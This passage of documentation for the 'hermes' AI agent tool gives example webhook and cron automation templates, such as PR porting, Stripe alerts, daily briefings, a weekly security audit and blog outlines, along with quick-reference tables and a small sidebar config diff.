When a PR merges in one repo, automatically port the equivalent change to another.
**Trigger:** GitHub webhook
```bash
hermes webhook subscribe auto-port \
--events "pull_request" \
--prompt "PR merged in the source repository:
Repository: {repository.full_name}
PR #{pull_request.number}: {pull_request.title}
Author: {pull_request.user.login}
Action: {action}
Merge commit: {pull_request.merge_commit_sha}
If action is 'closed' and pull_request.merged is true:
1. Fetch the diff: curl -sL {pull_request.diff_url}
2. Analyze what changed
3. Determine if this change needs to be ported to the Go SDK equivalent
4. If yes, create a branch, apply the equivalent changes, and open a PR on the target repo
5. Reference the original PR in the new PR description
If action is not 'closed' or not merged, respond with [SILENT]." \
--skills "github-pr-workflow" \
--deliver log
```
---
## Business Operations
### Stripe Payment Monitoring
Track payment events and get summaries of failures.
**Trigger:** API call (webhook)
```bash
hermes webhook subscribe stripe-payments \
--events "payment_intent.succeeded,payment_intent.payment_failed,charge.dispute.created" \
--prompt "Stripe event received:
Event type: {type}
Amount: {data.object.amount} cents ({data.object.currency})
Customer: {data.object.customer}
Status: {data.object.status}
For payment_intent.payment_failed:
- Identify the failure reason from {data.object.last_payment_error}
- Suggest whether this is a transient issue (retry) or permanent (contact customer)
For charge.dispute.created:
- Flag as urgent
- Summarize the dispute details
For payment_intent.succeeded:
- Brief confirmation only
Keep responses concise for the ops channel." \
--deliver slack
```
### Daily Revenue Summary
Compile key business metrics every morning.
**Trigger:** Schedule (daily)
```bash
hermes cron create "0 8 * * *" \
"Generate a morning business metrics summary.
Search the web for:
1. Current Bitcoin and Ethereum prices
2. S&P 500 status (pre-market or previous close)
3. Any major tech/AI industry news from the last 12 hours
Format as a brief morning briefing, 3-4 bullet points max.
Deliver as a clean, scannable message." \
--name "Morning briefing" \
--deliver telegram
```
---
## Multi-Skill Workflows
### Security Audit Pipeline
Combine multiple skills for a comprehensive weekly security review.
**Trigger:** Schedule (weekly)
```bash
hermes cron create "0 3 * * 0" \
"Run a comprehensive security audit of the hermes-agent codebase.
1. Check for dependency vulnerabilities (pip audit, npm audit)
2. Search the codebase for common security anti-patterns:
- Hardcoded secrets or API keys
- SQL injection vectors (string formatting in queries)
- Path traversal risks (user input in file paths without validation)
- Unsafe deserialization (pickle.loads, yaml.load without SafeLoader)
3. Review recent commits (last 7 days) for security-relevant changes
4. Check if any new environment variables were added without being documented
Write a security report with findings categorized by severity (Critical, High, Medium, Low).
If nothing found, report a clean bill of health." \
--skills "codebase-security-audit" \
--name "Weekly security audit" \
--deliver telegram
```
### Content Pipeline
Research, draft, and prepare content on a schedule.
**Trigger:** Schedule (weekly)
```bash
hermes cron create "0 10 * * 3" \
"Research and draft a technical blog post outline about a trending topic in AI agents.
1. Search the web for the most discussed AI agent topics this week
2. Pick the most interesting one that's relevant to open-source AI agents
3. Create an outline with:
- Hook/intro angle
- 3-4 key sections
- Technical depth appropriate for developers
- Conclusion with actionable takeaway
4. Save the outline to ~/drafts/blog-$(date +%Y%m%d).md
Keep the outline to ~300 words. This is a starting point, not a finished post." \
--name "Blog outline" \
--deliver local
```
---
## Quick Reference
### Cron Schedule Syntax
| Expression | Meaning |
|-----------|---------|
| `every 30m` | Every 30 minutes |
| `every 2h` | Every 2 hours |
| `0 2 * * *` | Daily at 2:00 AM |
| `0 9 * * 1` | Every Monday at 9:00 AM |
| `0 9 * * 1-5` | Weekdays at 9:00 AM |
| `0 3 * * 0` | Every Sunday at 3:00 AM |
| `0 */6 * * *` | Every 6 hours |
### Delivery Targets
| Target | Flag | Notes |
|--------|------|-------|
| Same chat | `--deliver origin` | Default — delivers to where the job was created |
| Local file | `--deliver local` | Saves output, no notification |
| Telegram | `--deliver telegram` | Home channel, or `telegram:CHAT_ID` for specific |
| Discord | `--deliver discord` | Home channel, or `discord:CHANNEL_ID` |
| Slack | `--deliver slack` | Home channel |
| SMS | `--deliver sms:+15551234567` | Direct to phone number |
| Specific thread | `--deliver telegram:-100123:456` | Telegram forum topic |
### Webhook Template Variables
| Variable | Description |
|----------|-------------|
| `{pull_request.title}` | PR title |
| `{issue.number}` | Issue number |
| `{repository.full_name}` | `owner/repo` |
| `{action}` | Event action (opened, closed, etc.) |
| `{__raw__}` | Full JSON payload (truncated at 4000 chars) |
| `{sender.login}` | GitHub user who triggered the event |
### The [SILENT] Pattern
When a cron job's response contains `[SILENT]`, delivery is suppressed. Use this to avoid notification spam on quiet runs:
```
If nothing noteworthy happened, respond with [SILENT].
```
This means you only get notified when the agent has something to report.

View File

@@ -153,6 +153,7 @@ const sidebars: SidebarsConfig = {
'guides/use-voice-mode-with-hermes',
'guides/build-a-hermes-plugin',
'guides/automate-with-cron',
'guides/automation-templates',
'guides/cron-troubleshooting',
'guides/work-with-skills',
'guides/delegation-patterns',